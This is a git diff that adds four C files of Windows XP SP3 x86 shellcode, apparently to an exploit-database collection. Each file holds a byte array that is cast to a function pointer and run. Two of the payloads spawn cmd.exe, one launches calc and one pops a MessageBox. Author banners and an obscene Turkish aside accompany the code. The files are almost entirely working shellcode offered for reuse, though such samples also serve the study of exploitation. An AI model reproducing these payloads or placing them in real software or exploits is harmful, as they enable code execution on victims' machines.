\ No newline at end of file
diff --git a/shellcodes/windows_x86/43771.c b/shellcodes/windows_x86/43771.c
new file mode 100644
index 000000000..2af3562ae
--- /dev/null
+++ b/shellcodes/windows_x86/43771.c
@@ -0,0 +1,29 @@
+# Title        : win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes
+# Proof        : http://img59.imageshack.us/img59/6499/proofc.png
+# Author       : ZoRLu / http://inj3ct0r.com/author/577
+# mail-msn     : admin@yildirimordulari.com
+# Home         : http://z0rlu.blogspot.com
+# Date         : 15/09/2010
+# Tesekkur     : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
+# Temenni      : Yeni Anayasamiz Hayirli Olsun
+# Lakirdi      : I dont know very well assembly. but, I know I will learn its too :P
+
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+ 
+int main(){
+    
+    unsigned char shellcode[]=
+    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x12\x53\xbb\xad\x23\x86\x7c"
+    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
+    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x6d\x64\x2e\x65\x78"
+    "\x65";
+ 
+    printf("Size = %d bytes\n", strlen(shellcode));
+ 
+    ((void (*)())shellcode)();
+ 
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43772.c b/shellcodes/windows_x86/43772.c
new file mode 100644
index 000000000..bc0fea630
--- /dev/null
+++ b/shellcodes/windows_x86/43772.c
@@ -0,0 +1,51 @@
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1                 ###########################################          1
+0                 I'm ZoRLu member from Inj3ct0r Team                  1
+1                 ###########################################          0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+# Title        : win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes
+# Proof        : http://img36.imageshack.us/img36/1183/cmdm.jpg
+# Plat.        : win32 / windows
+# Author       : ZoRLu / http://inj3ct0r.com/author/577
+# mail-msn     : admin@yildirimordulari.com
+# Home         : http://z0rlu.blogspot.com
+# Thanks       : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
+# Date         : 01/10/2010
+# Tesekkur     : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
+# Lakirdi      : Okudugumuz icin Cezalandiran Sistemin amina koyim / Kpss Anani ...
+# Lakirdi      : Son 31 Gun
+ 
+ 
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+   
+int main(){
+      
+    unsigned char shellcode[]=
+    "\x31\xc0\xeb\x13\x5b\x88\x43\x0e\x53\xbb\xad\x23\x86\x7c\xff\xd3\xbb"
+    "\xfa\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
+    "\x65\x20\x2f\x63\x20\x63\x6d\x64";
+   
+    printf("Size = %d bytes\n", strlen(shellcode));
+   
+    ((void (*)())shellcode)();
+      
+      
+   
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43773.c b/shellcodes/windows_x86/43773.c
new file mode 100644
index 000000000..51dfba5ea
--- /dev/null
+++ b/shellcodes/windows_x86/43773.c
@@ -0,0 +1,24 @@
+/*------------------------------------------------------------------------
+  Title...................Windows XP SP3 EN Calc Shellcode 16 Bytes
+  Release Date............12/7/2010
+  Tested On...............Windows XP SP3 EN
+  ------------------------------------------------------------------------
+  Author..................John Leitch
+  Site....................http://www.johnleitch.net/
+  Email...................john.leitch5@gmail.com
+  ------------------------------------------------------------------------*/
+
+int main(int argc, char *argv[])
+{
+    char shellcode[] =         
+        "\x31\xC9"                // xor ecx,ecx        
+        "\x51"                    // push ecx        
+        "\x68\x63\x61\x6C\x63"    // push 0x636c6163        
+        "\x54"                    // push dword ptr esp        
+        "\xB8\xC7\x93\xC2\x77"    // mov eax,0x77c293c7        
+        "\xFF\xD0";               // call eax         
+ 
+    ((void(*)())shellcode)();
+ 
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43774.c b/shellcodes/windows_x86/43774.c
new file mode 100644
index 000000000..874105ea7
--- /dev/null
+++ b/shellcodes/windows_x86/43774.c
@@ -0,0 +1,19 @@
+/*
+Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
+Author: d3c0der - d3c0der[at]hotmail[dot]com
+Tested on: WinXP Pro SP3 (EN)  # ( run MessageBox that show an error message )
+website : Www.AttackerZ.ir
+spt : All firends ;)
+*/
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+ 
+char code[] =   "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
+ 
+int main(int argc, char **argv)
+{
+    ((void (*)())code)();
+     
+    return 0;
+}
\ No newline at end of file